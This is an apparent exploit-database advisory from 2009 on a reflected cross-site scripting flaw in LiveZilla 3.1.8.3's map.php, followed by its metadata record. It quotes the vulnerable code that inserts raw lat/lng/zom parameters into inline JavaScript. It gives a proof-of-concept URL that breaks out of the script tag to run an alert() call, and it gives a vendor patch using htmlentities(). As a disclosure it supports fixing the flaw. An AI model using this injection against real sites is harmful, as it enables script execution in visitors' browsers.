ID 1337DAY-ID-10523 Type zdt Reporter MaXe Modified 2009-12-30T00:00:00
Description
Exploit for unknown platform in category web applications
====================================
LiveZilla v3.1.8.3 XSS Vulnerability
====================================
Info:
LiveZilla, the Next Generation Live Help / Live Chat and Live
Support System connects you to your website visitors. Use
LiveZilla to provide Live Chats and monitor your website visitors
in real-time. Convert visitors to customers - with LiveZilla!
Credits: InterN0T
External Links:
http://www.livezilla.net/
-:: The Advisory ::-
The following files would together be vulnerable to Cross Site Scripting.
1. livezilla/templates/map.tpl (lines 18-20)
var default_lat = <!--dlat-->;
var default_lng = <!--dlng-->;
var default_zom = <!--dzom-->;
2. livezilla/map.php (lines 15-28)
if(isset($_GET["lat"]))
$map = str_replace("<!--dlat-->",$_GET["lat"],$map);
else
$map = str_replace("<!--dlat-->","25",$map);
if(isset($_GET["lng"]))
$map = str_replace("<!--dlng-->",$_GET["lng"],$map);
else
$map = str_replace("<!--dlng-->","10",$map);
if(isset($_GET["zom"]))
$map = str_replace("<!--dzom-->",$_GET["zom"],$map);
else
$map = str_replace("<!--dzom-->","1",$map);
Proof of Concept: (</script>)
http://localhost/livezilla/map.php?lat=%3C/script%3E%3Cscript%3Ealert(%22InterN0T.net%22)%3C/script%3E
Pseudo Proof of Concept:
- Javascript functions could also have been executed inside the javascript where the vulnerable code is.
-:: Solution ::-
The following patch was supplied to the vendor:
1. livezilla/templates/map.tpl (lines 18-20)
var default_lat = "<!--dlat-->";
var default_lng = "<!--dlng-->";
var default_zom = "<!--dzom-->";
2. livezilla/map.php (lines 15-28)
if(isset($_GET["lat"]))
$map = str_replace("<!--dlat-->",htmlentities($_GET["lat"]),$map);
else
$map = str_replace("<!--dlat-->","25",$map);
if(isset($_GET["lng"]))
$map = str_replace("<!--dlng-->",htmlentities($_GET["lng"]),$map);
else
$map = str_replace("<!--dlng-->","10",$map);
if(isset($_GET["zom"]))
$map = str_replace("<!--dzom-->",htmlentities($_GET["zom"]),$map);
else
$map = str_replace("<!--dzom-->","1",$map);
We used htmlentities() since we thought that would be the best
solution. The other functions named htmlspecialchars(), urlencode()
and raw_urlencode() could have been an alternative to the above.
# 0day.today [2018-01-09] #
{"published": "2009-12-30T00:00:00", "id": "1337DAY-ID-10523", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category web applications", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-01-10T01:13:39", "rev": 2}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:5504", "SECURITYVULNS:DOC:13279", "SECURITYVULNS:VULN:10523", "SECURITYVULNS:DOC:10523"]}], "modified": "2018-01-10T01:13:39", "rev": 2}, "vulnersScore": 0.2}, "type": "zdt", "lastseen": "2018-01-10T01:13:39", "edition": 2, "title": "LiveZilla v3.1.8.3 XSS Vulnerability", "href": "https://0day.today/exploit/description/10523", "modified": "2009-12-30T00:00:00", "bulletinFamily": "exploit", "viewCount": 3, "cvelist": [], "sourceHref": "https://0day.today/exploit/10523", "references": [], "reporter": "MaXe", "sourceData": "====================================\r\nLiveZilla v3.1.8.3 XSS Vulnerability\r\n====================================\r\n\r\nInfo:\r\nLiveZilla, the Next Generation Live Help / Live Chat and Live\r\nSupport System connects you to your website visitors. Use\r\nLiveZilla to provide Live Chats and monitor your website visitors\r\nin real-time. Convert visitors to customers - with LiveZilla!\r\n \r\nCredits: InterN0T\r\n \r\nExternal Links:\r\nhttp://www.livezilla.net/\r\n \r\n \r\n-:: The Advisory ::-\r\nThe following files would together be vulnerable to Cross Site Scripting.\r\n \r\n1. livezilla/templates/map.tpl (lines 18-20)\r\nvar default_lat = <!--dlat-->;\r\nvar default_lng = <!--dlng-->;\r\nvar default_zom = <!--dzom-->;\r\n \r\n2. livezilla/map.php (lines 15-28)\r\nif(isset($_GET[\"lat\"]))\r\n$map = str_replace(\"<!--dlat-->\",$_GET[\"lat\"],$map);\r\nelse\r\n$map = str_replace(\"<!--dlat-->\",\"25\",$map);\r\n \r\nif(isset($_GET[\"lng\"]))\r\n$map = str_replace(\"<!--dlng-->\",$_GET[\"lng\"],$map);\r\nelse\r\n$map = str_replace(\"<!--dlng-->\",\"10\",$map);\r\n \r\nif(isset($_GET[\"zom\"]))\r\n$map = str_replace(\"<!--dzom-->\",$_GET[\"zom\"],$map);\r\nelse\r\n$map = str_replace(\"<!--dzom-->\",\"1\",$map);\r\n \r\n \r\nProof of Concept: (</script>)\r\nhttp://localhost/livezilla/map.php?lat=%3C/script%3E%3Cscript%3Ealert(%22InterN0T.net%22)%3C/script%3E\r\n \r\nPseudo Proof of Concept:\r\n- Javascript functions could also have been executed inside the javascript where the vulnerable code is.\r\n \r\n \r\n-:: Solution ::-\r\nThe following patch was supplied to the vendor:\r\n \r\n1. livezilla/templates/map.tpl (lines 18-20)\r\nvar default_lat = \"<!--dlat-->\";\r\nvar default_lng = \"<!--dlng-->\";\r\nvar default_zom = \"<!--dzom-->\";\r\n \r\n2. livezilla/map.php (lines 15-28)\r\nif(isset($_GET[\"lat\"]))\r\n$map = str_replace(\"<!--dlat-->\",htmlentities($_GET[\"lat\"]),$map);\r\nelse\r\n$map = str_replace(\"<!--dlat-->\",\"25\",$map);\r\n \r\nif(isset($_GET[\"lng\"]))\r\n$map = str_replace(\"<!--dlng-->\",htmlentities($_GET[\"lng\"]),$map);\r\nelse\r\n$map = str_replace(\"<!--dlng-->\",\"10\",$map);\r\n \r\nif(isset($_GET[\"zom\"]))\r\n$map = str_replace(\"<!--dzom-->\",htmlentities($_GET[\"zom\"]),$map);\r\nelse\r\n$map = str_replace(\"<!--dzom-->\",\"1\",$map);\r\nWe used htmlentities() since we thought that would be the best\r\nsolution. The other functions named htmlspecialchars(), urlencode()\r\nand raw_urlencode() could have been an alternative to the above.\r\n\r\n\r\n\n# 0day.today [2018-01-09] #"}
